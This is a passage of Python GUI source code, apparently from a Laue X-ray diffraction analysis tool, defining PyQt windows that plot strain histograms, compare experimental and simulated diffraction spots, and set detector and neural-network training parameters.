self.canvas.axes.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes.grid(True)
self.canvas.axes1.set_title(r"$\epsilon_{22}$ (%)", loc='center', fontsize=10)
logdata = e22c
self.canvas.axes1.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes1.set_ylabel('Frequency', fontsize=8)
self.canvas.axes1.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes1.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes1.grid(True)
self.canvas.axes2.set_title(r"$\epsilon_{33}$ (%)", loc='center', fontsize=10)
logdata = e33c
self.canvas.axes2.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes2.set_ylabel('Frequency', fontsize=8)
self.canvas.axes2.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes2.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes2.grid(True)
self.canvas.axes3.set_title(r"$\epsilon_{12}$ (%)", loc='center', fontsize=10)
logdata = e12c
self.canvas.axes3.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes3.set_ylabel('Frequency', fontsize=8)
self.canvas.axes3.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes3.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes3.grid(True)
self.canvas.axes4.set_title(r"$\epsilon_{13}$ (%)", loc='center', fontsize=10)
logdata = e13c
self.canvas.axes4.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes4.set_ylabel('Frequency', fontsize=8)
self.canvas.axes4.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes4.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes4.grid(True)
self.canvas.axes5.set_title(r"$\epsilon_{23}$ (%)", loc='center', fontsize=10)
logdata = e23c
self.canvas.axes5.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes5.set_ylabel('Frequency', fontsize=8)
self.canvas.axes5.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes5.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes5.grid(True)
# except:
# pass
# Trigger the canvas to update and redraw.
self.canvas.draw()
class MyPopup_image(QWidget):
def __init__(self, th_exp, chi_exp, intensity, tth_sim, chi_sim, sim_energy, sim_hkl, \
ix, iy, file, exp_linkspots, residues, theo_index, rotation_matrix):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.Data_X = th_exp*2.0
self.Data_Y = chi_exp
self.Data_index_expspot = list(range(len(th_exp)))
self.Data_I = intensity
self.data_theo_X = tth_sim
self.data_theo_Y = chi_sim
self.data_theo_hkl = sim_hkl
self.data_theo_energy = sim_energy
self.Data_index_simspot = list(range(len(tth_sim)))
self.iy,self.ix,self.file = iy, ix, file
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Drop off the first y element, append a new one.
self.intensity = intensity / np.amax(intensity) * 100.0
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(iy,ix,file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(th_exp*2.0, chi_exp, c='k', s=self.intensity, cmap="gray", label="Exp spots")
if len(tth_sim) != 0:
self.scatter = self.canvas.axes.scatter(tth_sim, chi_sim, s=120, facecolor='none', edgecolor='r', label="Best match spots")
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
self.annot = self.canvas.axes.annotate("", xy=(0,0),
bbox=dict(boxstyle="round", fc="w"),
arrowprops=dict(arrowstyle="->"))
self.canvas.mpl_connect('motion_notify_event', self.onmovemouse)
self._createDisplay() ## display screen
##create a text string to display
if len(tth_sim) != 0:
temp_ = rotation_matrix.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Rotation matrix is: "+string1
self.setDisplayText(texttstr)
texttstr = "# Total experimental spots : "+str(len(th_exp))
self.setDisplayText(texttstr)
texttstr = "# Average residues : "+str(np.average(residues))
self.setDisplayText(texttstr)
texttstr = "# Total linked spots : "+str(len(exp_linkspots))
self.setDisplayText(texttstr)
texttstr = "# Matching rate : "+str(len(exp_linkspots)/len(tth_sim))
self.setDisplayText(texttstr)
texttstr = "# Simulated_spots\tHKL\tExperimental_spots\tResidues\t "
self.setDisplayText(texttstr)
for i in range(len(theo_index)):
texttstr = str(theo_index[i])+"\t\t"+str(sim_hkl[theo_index[i],:])+"\t"+str(exp_linkspots[i])+"\t\t"+str(residues[i])
self.setDisplayText(texttstr)
def update_annot(self, ind, vis, cont, ind1, cont1):
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(self.iy,self.ix,self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(self.Data_X, self.Data_Y, c='k', s=self.intensity, cmap="gray", label="Exp spots")
if len(self.data_theo_X) != 0:
self.scatter = self.canvas.axes.scatter(self.data_theo_X, self.data_theo_Y, s=120, facecolor='none', edgecolor='r', label="Best match spots")
if cont:
pos = self.scatter.get_offsets()[ind["ind"][0]]
n = ind["ind"][0]
if ind1 != None and cont1:
n1 = ind1["ind"][0]
else:
n1=""
text = "ExpIndex={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(" "+str(n1),
" "+str(n),
" "+str(np.round(self.data_theo_X[n],2)),
" "+str(np.round(self.data_theo_Y[n],2)),
" "+str(self.data_theo_hkl[n]),
" "+str(np.round(self.data_theo_energy[n],2)))
self.annot = self.canvas.axes.annotate(text, xy=pos,xytext=(20,20),textcoords="offset points",
bbox=dict(boxstyle="round", fc="gray"),
arrowprops=dict(arrowstyle="->"))
self.annot.get_bbox_patch().set_alpha(0.5)
self.annot.set_visible(True)
elif not cont and vis:
self.annot.set_visible(False)
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
def onmovemouse(self,event):
try:
vis = self.annot.get_visible()
if event.inaxes == None:
return
cont, ind = self.scatter.contains(event)
try:
cont1, ind1 = self.scatter1.contains(event)
except:
cont1, ind1 = False, None
self.update_annot(ind, vis, cont, ind1, cont1)
except:
return
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.Start)
self.display.setFocus()
class Window_allmap(QWidget):
def __init__(self, limx, limy, filenm, ccd_label, predict_single_file_nodialog, detectorparameters):
super(Window_allmap, self).__init__()
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.lim_x, self.lim_y = limx, limy
self.filenm = filenm
self.ccd_label = ccd_label
self.detectorparameters = detectorparameters
self.diff_data = np.zeros((self.lim_x, self.lim_y))
self.predict_single_file_nodialog = predict_single_file_nodialog
self.setWindowTitle("Laue plot module (right click interactive)")
# self.myQMenuBar = QMenuBar(self)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.canvas.mpl_connect('button_press_event', self.onclickImage)
self.refresh_plot = QPushButton("Refresh plot")
self.refresh_plot.clicked.connect(self.refresh_plots)
self.img_similarity = QPushButton("Calculate image similarity")
self.img_similarity.clicked.connect(self.calculate_image_similarity)
# set the layout
self.popups = []
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.image_grid = QLineEdit()
self.image_grid.setText("10,10")
self.path_folder = QLineEdit()
self.path_folder.setText("")
formLayout = QFormLayout()
formLayout.addRow(self.refresh_plot, self.img_similarity)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
self.draw_something()
self.setFixedSize(16777215,16777215)
def refresh_plots(self):
self.draw_something()
def draw_something(self):
self.canvas.axes.cla()
self.canvas.axes.set_title("Spatial scan Laue map", loc='center', fontsize=10)
if np.all(self.diff_data == 0):
arr = np.random.randint(low = 0, high = 255, size = (self.lim_x, self.lim_y))
else:
arr = self.diff_data
self.canvas.axes.imshow(arr.astype('uint8'), origin='lower')
self.canvas.draw()
def calculate_image_similarity(self):
try:
values = []
count = 0
total = self.diff_data.shape[0]*self.diff_data.shape[1]
for ix in range(self.diff_data.shape[0]):
for iy in range(self.diff_data.shape[1]):
if iy == 0 and ix == 0:
continue
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
path = os.path.normpath(self.filenm[image_no].decode())
if (image_no % self.lim_y == 0) and image_no != 0:
old_image = image_no - self.lim_y
elif (image_no % self.lim_y != 0):
old_image = image_no - 1
path1 = os.path.normpath(self.filenm[old_image].decode())
values.append([path, path1, ix, iy, self.ccd_label, True, count, total])
count += 1
with multip.Pool(cpu_count()) as pool:
results = [pool.apply_async(mse_images, p) for p in values]
for r in results:
r1 = r.get()
self.diff_data[r1[2],r1[1]] = r1[0]
except:
print("Error in calculation of image similarity module")
self.draw_something()
def onclickImage(self, event123):
if event123.button == 3:
ix, iy = event123.xdata, event123.ydata
# try:
## read the saved COR file and extract exp spots info.## avoid zero index problem
ix = int(round(ix))
iy = int(round(iy))
try:
# self.lim_x * self.lim_y
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
path = os.path.normpath(self.filenm[image_no].decode())
Data, framedim, fliprot = IOimage.readCCDimage(path,
stackimageindex=-1,
CCDLabel=self.ccd_label,
dirname=None,
verbose=0)
except:
print(path)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No IMAGE file could be found for the selected pixel")
return
w = MyPopup_image_v1(ix, iy, path, Data, self.ccd_label,
self.predict_single_file_nodialog, image_no,
self.detectorparameters)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
# except:
# return
else:
print("Right click for plotting the pixel values")
class sample_config(QWidget):
def __init__(self):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self._createDisplay() ## display screen
self.setDisplayText(texttstr)
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.End)
self.display.setFocus()
class MyPopup(QWidget):
def __init__(self, match_rate12, rotation_matrix12, mat_global12, fR_pix12, filename,
straincrystal, strainsample, end_time, mode_analysis, th_exp, chi_exp, intensity, tth_sim, chi_sim,
sim_energy, sim_hkl, exp_linkspots, residues, theo_index, hkl_prediction=False):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.Data_X = th_exp*2.0
self.Data_Y = chi_exp
self.Data_index_expspot = list(range(len(th_exp)))
self.Data_I = intensity
self.hkl_prediction = hkl_prediction
self.data_theo_X = tth_sim
self.data_theo_Y = chi_sim
self.data_theo_hkl = sim_hkl
self.data_theo_energy = sim_energy
self.Data_index_simspot = list(range(len(tth_sim)))
self.file = filename
self.match_rate12987 = match_rate12
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Drop off the first y element, append a new one.
self.intensity = intensity / np.amax(intensity) * 100.0
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern (file: %s)"%(filename), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(th_exp*2.0, chi_exp, c='k', s=self.intensity, cmap="gray", label="Exp spots")
cycle_color = ["b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold",
"b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold",
"b","c","g","m","r","y","brown","gray","purple","orange","bisque","lime","gold"]
self.cycle_color = cycle_color
## convert into a single variable
tth_s, chi_s, color_s, label_s, theohkl_s, theoenergy_s = [], [], [], [], [], []
for ijk in range(len(match_rate12)):
if len(tth_sim[ijk]) != 0:
for okl in range(len(tth_sim[ijk])):
tth_s.append(tth_sim[ijk][okl])
chi_s.append(chi_sim[ijk][okl])
color_s.append(cycle_color[ijk])
theohkl_s.append(sim_hkl[ijk][okl])
theoenergy_s.append(sim_energy[ijk])
label_s.append("Matrix "+str(ijk+1))
self.scatter = self.canvas.axes.scatter(tth_s, chi_s, s=120, facecolor='none',
edgecolor=color_s)#, label="Matrix "+str(ijk+1))
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
self.annot = self.canvas.axes.annotate("", xy=(0,0),
bbox=dict(boxstyle="round", fc="w"),
arrowprops=dict(arrowstyle="->"))
self.canvas.mpl_connect('motion_notify_event', self.onmovemouse)
self._createDisplay() ## display screen
##create a text string to display
texttstr = "Predicted for File: "+filename+ " \n"
self.setDisplayText(texttstr)
texttstr = "# Total experimental spots : "+str(len(th_exp))
self.setDisplayText(texttstr)
self.setDisplayText("################## "+mode_analysis+" MODE ############### \n")
for ijk in range(len(match_rate12)):
if len(tth_sim[ijk]) != 0:
self.setDisplayText("--------------- Matrix "+str(ijk+1)+" \n")
texttstr = "# Average residues : "+str(np.average(residues[ijk]))
self.setDisplayText(texttstr)
texttstr = "# Total linked spots : "+str(len(exp_linkspots[ijk]))
self.setDisplayText(texttstr)
texttstr = "# Matching rate : "+str(len(exp_linkspots[ijk])/len(tth_sim[ijk]))
self.setDisplayText(texttstr)
texttstr = "Matching rate for the proposed matrix is: "+str(match_rate12[ijk][0])+ " \n"
self.setDisplayText(texttstr)
texttstr = "Identified material index is: "+str(mat_global12[ijk][0])+ " \n"
self.setDisplayText(texttstr)
temp_ = rotation_matrix12[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Rotation matrix is: "+string1
self.setDisplayText(texttstr)
temp_ = straincrystal[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Strain crystal reference frame is: "+string1
self.setDisplayText(texttstr)
temp_ = strainsample[ijk][0].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
texttstr = "Strain sample reference frame is: "+string1
self.setDisplayText(texttstr)
texttstr = "Final pixel residues is: "+str(fR_pix12[ijk][0]) + " \n"
self.setDisplayText(texttstr)
texttstr = "Total time in seconds (Loading image, peak detection, HKL prediction, Orientation matrix computation, strain computation): "+str(end_time) + " \n"
self.setDisplayText(texttstr)
def update_annot(self, ind, vis, cont, ind1, cont1):
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern (file: %s)"%(self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(self.Data_X, self.Data_Y, c='k', s=self.intensity, label="Exp spots")
## convert into a single variable
tth_s, chi_s, color_s, label_s, theohkl_s, theoenergy_s = [], [], [], [], [], []
for ijk in range(len(self.match_rate12987)):
if len(self.data_theo_X[ijk]) != 0:
for okl in range(len(self.data_theo_X[ijk])):
tth_s.append(self.data_theo_X[ijk][okl])
chi_s.append(self.data_theo_Y[ijk][okl])
color_s.append(self.cycle_color[ijk])
theohkl_s.append(self.data_theo_hkl[ijk][okl])
theoenergy_s.append(self.data_theo_energy[ijk][okl])
label_s.append(ijk+1)
self.scatter = self.canvas.axes.scatter(tth_s, chi_s, s=120, facecolor='none',
edgecolor=color_s)
if ind != None and cont:
pos = self.scatter.get_offsets()[ind["ind"][0]]
n = ind["ind"][0]
else:
n=""
if ind1 != None and cont1:
pos = self.scatter1.get_offsets()[ind1["ind"][0]]
n1 = ind1["ind"][0]
else:
n1=""
try:
pp123 = self.hkl_prediction[n1,:]
except:
pp123 = "No prediction"
if n=="":
text = "\nExpIndex={} \nPrediction={}".format(" "+str(n1)," "+str(pp123))
elif n1 == "":
text = "\nMatrix={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(
" "+str(label_s[n]),
" "+str(n),
" "+str(np.round(tth_s[n],2)),
" "+str(np.round(chi_s[n],2)),
" "+str(theohkl_s[n]),
" "+str(np.round(theoenergy_s[n],2)))
else:
text = "\nMatrix={} \nExpIndex={} \nPrediction={} \nTheoIndex={} \n2Theta={} \nChi={} \nHKL={} \nEnergy={}".format(
" "+str(label_s[n]),
" "+str(n1),
" "+str(pp123),
" "+str(n),
" "+str(np.round(tth_s[n],2)),
" "+str(np.round(chi_s[n],2)),
" "+str(theohkl_s[n]),
" "+str(np.round(theoenergy_s[n],2)))
self.annot = self.canvas.axes.annotate(text, xy=pos, xytext=(20,20), textcoords="offset points",
bbox=dict(boxstyle="round", fc="gray"),
arrowprops=dict(arrowstyle="->"))
self.annot.get_bbox_patch().set_alpha(0.5)
self.annot.set_visible(True)
# Trigger the canvas to update and redraw.
self.canvas.axes.grid(True)
self.canvas.axes.legend(fontsize=8)
self.canvas.draw()
def onmovemouse(self,event):
# try:
vis = self.annot.get_visible()
if event.inaxes == None:
return
try:
cont, ind = self.scatter.contains(event)
except:
cont, ind = False, None
try:
cont1, ind1 = self.scatter1.contains(event)
except:
cont1, ind1 = False, None
if cont or cont1:
self.update_annot(ind, vis, cont, ind1, cont1)
# except:
# return
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.Start)
self.display.setFocus()
class AnotherWindowParams(QWidget):
got_signal = QtCore.pyqtSignal(dict)
def __init__(self, state=0, gui_state=0):
super().__init__()
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.setFixedSize(500, 500)
self.settings = QSettings("config_data_"+str(gui_state),"ConfigGUI_"+str(gui_state))
## Material detail
self.dict_LT = QComboBox()
sortednames = sorted(dictLT.dict_Materials.keys(), key=lambda x:x.lower())
for s in sortednames:
self.dict_LT.addItem(s)
self.dict_LT1 = QComboBox()
sortednames = sorted(dictLT.dict_Materials.keys(), key=lambda x:x.lower())
for s in sortednames:
self.dict_LT1.addItem(s)
if main_directory != None:
self.modelDirecSave = main_directory
else:
self.modelDirecSave = None
self.model_direc_save = QPushButton('Browse')
self.model_direc_save.clicked.connect(self.getfiles)
self.symmetry = QComboBox()
symmetry_names = ["cubic","hexagonal","orthorhombic","tetragonal","trigonal","monoclinic","triclinic"]
for s in symmetry_names:
self.symmetry.addItem(s)
self.symmetry1 = QComboBox()
symmetry_names = ["cubic","hexagonal","orthorhombic","tetragonal","trigonal","monoclinic","triclinic"]
for s in symmetry_names:
self.symmetry1.addItem(s)
self.prefix = QLineEdit()
self.prefix.setText("") ## Prefix for folder
self.hkl_max = QLineEdit()
self.hkl_max.setText("auto") ## auto or some indices of HKL
self.elements = QLineEdit()
self.elements.setText("200") ## all or some length
self.freq_rmv = QLineEdit()
self.freq_rmv.setText("1") ## auto or some indices of HKL
self.hkl_max1 = QLineEdit()
self.hkl_max1.setText("auto") ## auto or some indices of HKL
self.elements1 = QLineEdit()
self.elements1.setText("200") ## all or some length
self.freq_rmv1 = QLineEdit()
self.freq_rmv1.setText("1") ## auto or some indices of HKL
self.maximum_angle_to_search = QLineEdit()
self.maximum_angle_to_search.setText("90")
self.step_for_binning = QLineEdit()
self.step_for_binning.setText("0.1")
self.mode_of_analysis = QComboBox()
mode_ = ["1","0"]
for s in mode_:
self.mode_of_analysis.addItem(s)
self.nb_grains_per_lp = QLineEdit()
self.nb_grains_per_lp.setText("5")
self.nb_grains_per_lp1 = QLineEdit()
self.nb_grains_per_lp1.setText("5")
self.grains_nb_simulate = QLineEdit()
self.grains_nb_simulate.setText("500")
self.detectordistance = QLineEdit()
self.detectordistance.setText("79.553")
self.xycenter = QLineEdit()
self.xycenter.setText("979.32,932.31")
self.bgdetector = QLineEdit()
self.bgdetector.setText("0.37,0.447")
self.detectordim = QLineEdit()
self.detectordim.setText("2018,2016")
self.pixelsize = QLineEdit()
self.pixelsize.setText("0.0734")
self.minmaxE = QLineEdit()
self.minmaxE.setText("5,18")
self.include_scm = QComboBox()
modes = ["no", "yes"]
for s in modes:
self.include_scm.addItem(s)
self.architecture = QComboBox()
modes = ["Classical-inbuilt","from file"]
for s in modes:
self.architecture.addItem(s)
self.learningrate_rc = QLineEdit()
self.learningrate_rc.setText("1e-3,1e-5,1e-6")
self.mode_nn = QComboBox()
modes = ["Generate Data & Train","Train","Predict"]
for s in modes:
self.mode_nn.addItem(s)
self.batch_size = QLineEdit()
self.batch_size.setText("20")
self.epochs = QLineEdit()
self.epochs.setText("5")
self.grid_search_hyperparams = QComboBox()
mode_ = ["False","True"]
for s in mode_:
self.grid_search_hyperparams.addItem(s)
self.texture_model = QComboBox()
mode_ = ["in-built_Uniform_Distribution","random","from file"]
for s in mode_:
self.texture_model.addItem(s)
# button to continue training
self.btn_config = QPushButton('Accept')
self.btn_config.clicked.connect(self.send_details_mainGUI)
close_button = QPushButton("Cancel")
close_button.clicked.connect(self.close)
### set some default values
if freq_rmv_global != None:
self.freq_rmv.setText(str(freq_rmv_global))
if elements_global != None:
self.elements.setText(elements_global)
if hkl_max_global != None:
self.hkl_max.setText(hkl_max_global)
if nb_grains_per_lp_global != None:
self.nb_grains_per_lp.setText(str(nb_grains_per_lp_global))
if freq_rmv1_global != None:
self.freq_rmv1.setText(str(freq_rmv1_global))
if elements1_global != None:
self.elements1.setText(elements1_global)
if hkl_max1_global != None:
self.hkl_max1.setText(hkl_max1_global)
if nb_grains_per_lp1_global != None:
self.nb_grains_per_lp1.setText(str(nb_grains_per_lp1_global))
if include_scm_global:
self.include_scm.setCurrentText("yes")
else:
self.include_scm.setCurrentText("no")
if batch_size_global != None:
self.batch_size.setText(str(batch_size_global))
if epochs_global != None:
self.epochs.setText(str(epochs_global))
if maximum_angle_to_search_global != None:
self.maximum_angle_to_search.setText(str(maximum_angle_to_search_global))
if step_for_binning_global != None:
self.step_for_binning.setText(str(step_for_binning_global))
if grains_nb_simulate_global != None:
self.grains_nb_simulate.setText(str(grains_nb_simulate_global))
if symmetry_global != None:
self.symmetry.setCurrentText(symmetry_global)
if symmetry1_global != None:
self.symmetry1.setCurrentText(symmetry1_global)
if material_global != None:
self.dict_LT.setCurrentText(material_global)
if material1_global != None:
self.dict_LT1.setCurrentText(material1_global)
if prefix_global != None:
self.prefix.setText(prefix_global)
if detectorparameters_global != None:
self.detectordistance.setText(str(detectorparameters_global[0]))
self.xycenter.setText(str(detectorparameters_global[1])+","+str(detectorparameters_global[2]))
self.bgdetector.setText(str(detectorparameters_global[3])+","+str(detectorparameters_global[4]))
self.detectordim.setText(str(dim1_global)+","+str(dim2_global))
self.pixelsize.setText(str(pixelsize_global))
self.minmaxE.setText(str(emin_global)+","+str(emax_global))
self.layout = QVBoxLayout() # QGridLayout()
scroll = QScrollArea(self)
self.layout.addWidget(scroll)
scroll.setWidgetResizable(True)
scrollContent = QWidget(scroll)
formLayout = QFormLayout(scrollContent)
# formLayout = QFormLayout()
# formLayout.setVerticalSpacing(5)
formLayout.addRow('Training parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Directory where \n model files are saved', self.model_direc_save)
formLayout.addRow('Material details', QLineEdit().setReadOnly(True))
formLayout.addRow('Prefix for save folder', self.prefix)
formLayout.addRow('Choose Material and Symmetry \n (incase of 1 material, keep both same)', QLineEdit().setReadOnly(True))
formLayout.addRow(self.dict_LT, self.dict_LT1)
formLayout.addRow(self.symmetry, self.symmetry1)
formLayout.addRow('Class removal frequency', QLineEdit().setReadOnly(True))
formLayout.addRow(self.freq_rmv, self.freq_rmv1)
formLayout.addRow('Class length', QLineEdit().setReadOnly(True))
formLayout.addRow(self.elements, self.elements1)
formLayout.addRow('HKL max probed', QLineEdit().setReadOnly(True))
formLayout.addRow(self.hkl_max, self.hkl_max1)
formLayout.addRow('Histogram parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Angular distance to probe (in deg)', self.maximum_angle_to_search)
formLayout.addRow('Angular bin widths (in deg)', self.step_for_binning)
formLayout.addRow('Simulation parameters', QLineEdit().setReadOnly(True))
# formLayout.addRow('Analysis mode', self.mode_of_analysis)
formLayout.addRow('Max Nb. of grain in a LP', QLineEdit().setReadOnly(True))
formLayout.addRow(self.nb_grains_per_lp, self.nb_grains_per_lp1)
formLayout.addRow('Nb. of simulations', self.grains_nb_simulate)
formLayout.addRow('Include single crystal \n misorientation', self.include_scm)
formLayout.addRow('Detector parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Detector distance', self.detectordistance)
formLayout.addRow('Detector XY center', self.xycenter)
formLayout.addRow('Detector Beta Gamma', self.bgdetector)
formLayout.addRow('Detector Pixel size', self.pixelsize)
formLayout.addRow('Detector dimensions (dim1,dim2)', self.detectordim)
formLayout.addRow('Energy (Min, Max)', self.minmaxE)
formLayout.addRow('Neural Network parameters', QLineEdit().setReadOnly(True))
formLayout.addRow('Mode of analysis', self.mode_nn)
formLayout.addRow('Model Architecture', self.architecture)
formLayout.addRow('LR, Regularization coefficient', self.learningrate_rc)
formLayout.addRow('Batch size', self.batch_size)
formLayout.addRow('Epochs', self.epochs)
formLayout.addRow('Grid search for model Params', self.grid_search_hyperparams)
formLayout.addRow('Texture for data', self.texture_model)
# formLayout.setVerticalSpacing(5)
formLayout.addRow(close_button, self.btn_config)
scrollContent.setLayout(formLayout)
scroll.setWidget(scrollContent)
self.setLayout(self.layout)
self.setFixedSize(16777215,16777215)
#self._gui_save()
#if state > 0:
# self._gui_restore()
def getfiles(self):
self.modelDirecSave = QFileDialog.getExistingDirectory(self, 'Select Folder in which model files will be saved')
def _gui_save(self):
# Save geometry
for name, obj in inspect.getmembers(self):
# if type(obj) is QComboBox: # this works similar to isinstance, but missed some field... not sure why?
if isinstance(obj, QComboBox):
index = obj.currentIndex() # get current index from combobox
text = obj.itemText(index) # get the text for current index
self.settings.setValue(name, text) # save combobox selection to registry
if isinstance(obj, QLineEdit):
value = obj.text()
self.settings.setValue(name, value) # save ui values, so they can be restored next time
self.settings.sync()
def _gui_restore(self):
# Restore geometry
for name, obj in inspect.getmembers(self):
if isinstance(obj, QComboBox):
index = obj.currentIndex() # get current region from combobox
value = (self.settings.value(name))
if value == "":
continue
index = obj.findText(value) # get the corresponding index for specified string in combobox
if index == -1: # add to list if not found
obj.insertItems(0, [value])
index = obj.findText(value)
obj.setCurrentIndex(index)
else:
obj.setCurrentIndex(index) # preselect a combobox value by index
if isinstance(obj, QLineEdit):
value = (self.settings.value(name))#.decode('utf-8')) # get stored value from registry
obj.setText(value) # restore lineEditFile
self.settings.sync()
def send_details_mainGUI(self):
self._gui_save()
detector_params = [float(self.detectordistance.text()),
float(self.xycenter.text().split(",")[0]),
float(self.xycenter.text().split(",")[1]),
float(self.bgdetector.text().split(",")[0]),
float(self.bgdetector.text().split(",")[1])]
global prefix_global, weightfile_global, modelfile_global, model_weight_file
if self.prefix.text() != prefix_global:
prefix_global = self.prefix.text()
##exp directory
if material_global == material1_global:
fn = material_global + prefix_global
else:
fn = material_global + "_" + material1_global + prefix_global
modelfile_global = self.modelDirecSave + "//" + fn
if material_global == material1_global:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
weightfile_global = model_weight_file
else:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
else:
weightfile_global = model_weight_file
